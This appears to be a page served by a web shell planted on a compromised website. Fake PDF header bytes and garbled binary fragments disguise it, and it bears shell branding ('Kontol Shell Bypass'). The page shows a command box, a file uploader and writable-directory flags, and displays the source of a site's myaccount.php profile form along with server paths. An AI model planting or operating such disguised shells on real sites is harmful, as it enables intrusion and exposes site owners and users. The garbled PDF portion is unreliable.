%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/chalkbank.com/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/chalkbank.com/application/views/myaccount.php
<div class="main-wapper-inner">
<div class="top-menus">
<div class="container-fluid">
<div class="row">
	<div class="col-lg-12">
	 <h3><i class="fa fa-desktop"></i> <?php echo $this->lang->line('myprofile');?></h3>
	</div><!-- /input-group -->
</div>
</div><!-- /.col-lg-6 -->
</div><!-- /.row -->
<div class="home-inners">
<div class="container-fluid">
<div class="row">
     <form method="post" action="<?php echo site_url('user/update_user/'.$uid);?>" enctype="multipart/form-data">
	<div class="col-md-12">
    <br> 
     <div class="login-panel-de">
		<div class=""> 
	    <?php 
		if($this->session->flashdata('message')){
			echo $this->session->flashdata('message');	
		}
		?>	
			<div class="form-group">	 
				<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('user_name');?></label> 
				<input type="text" id="inputEmail" name="email" value="<?php echo $result['email'];?>" readonly=readonly class="form-control" placeholder="<?php echo $this->lang->line('user_name');?>" required autofocus>
		    </div>
			<div class="form-group">	  
					<label for="inputPassword" class="sr-only"><?php echo $this->lang->line('password');?></label>
					<input type="password" id="inputPassword" name="password"   value=""  class="form-control" placeholder="<?php echo $this->lang->line('password');?>"   >
			 </div>
				<div class="form-group">	 
					<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('first_name');?></label> 
					<input type="text"  name="first_name"  class="form-control"  value="<?php echo $result['first_name'];?>"  placeholder="<?php echo $this->lang->line('first_name');?>"   autofocus>
			</div>
				<div class="form-group">	 
					<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('last_name');?></label> 
					<input type="text"   name="last_name"  class="form-control"  value="<?php echo $result['last_name'];?>"  placeholder="<?php echo $this->lang->line('last_name');?>"   autofocus>
			</div>
				<div class="form-group">	 
					<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('contact_no');?></label> 
					<input type="text" name="contact_no"  class="form-control"  value="<?php echo $result['contact_no'];?>"  placeholder="<?php echo $this->lang->line('contact_no');?>"   autofocus>
			</div>		
			<div class="form-group">	 
					<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('user_email');?></label> 
					<input type="email" name="user_email"  class="form-control"  value="<?php echo $result['user_email'];?>"  placeholder="<?php echo $this->lang->line('user_email');?>"   autofocus>
			</div>	
			<div class="form-group">	 
					<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('subject');?></label> 
					<input type="text"   name="subject"  class="form-control" value="<?php echo $result['subject'];?>" placeholder="<?php echo $this->lang->line('subject');?>"   autofocus>
			</div>
				 
			<div class="form-group">	 
					<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('class_level');?></label> 
					<input type="text"   name="class_level"  class="form-control" value="<?php echo $result['class_level'];?>" placeholder="<?php echo $this->lang->line('class_level');?>"   autofocus>
			</div>
			<div class="form-group">	 
					<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('address');?></label> 
					<input type="text"   name="address"  class="form-control" value="<?php echo $result['address'];?>" placeholder="<?php echo $this->lang->line('address');?>"   autofocus>
			</div>
			<div class="form-group">	 
					<label for="inputEmail" class="sr-only"><?php echo $this->lang->line('school_name');?></label> 
					<input type="text"   name="school_name"  class="form-control" value="<?php echo $result['school_name'];?>" placeholder="<?php echo $this->lang->line('school_name');?>"   autofocus>
			</div>
			<div class="form-group">	 
					<label for="inputEmail" class="sr-only">Upload Profile Image</label>
					<?php if($result['profie_image']) { ?>
					<img src="<?=base_url('upload/profile_images/'.$result['profie_image'])?>" width="100px" height="80px;" />
					<input type="hidden" name="old_image" value="<?=$result['profie_image']?>" />
					<?php } ?>
					<input type="file" name="profile_image" class="form-control"  />
			</div>
			<button class="btn btn-success" type="submit"><?php echo $this->lang->line('submit');?></button>
		</div>
</div>
</div>
</form>
</div>
</div>
</div>

Kontol Shell Bypass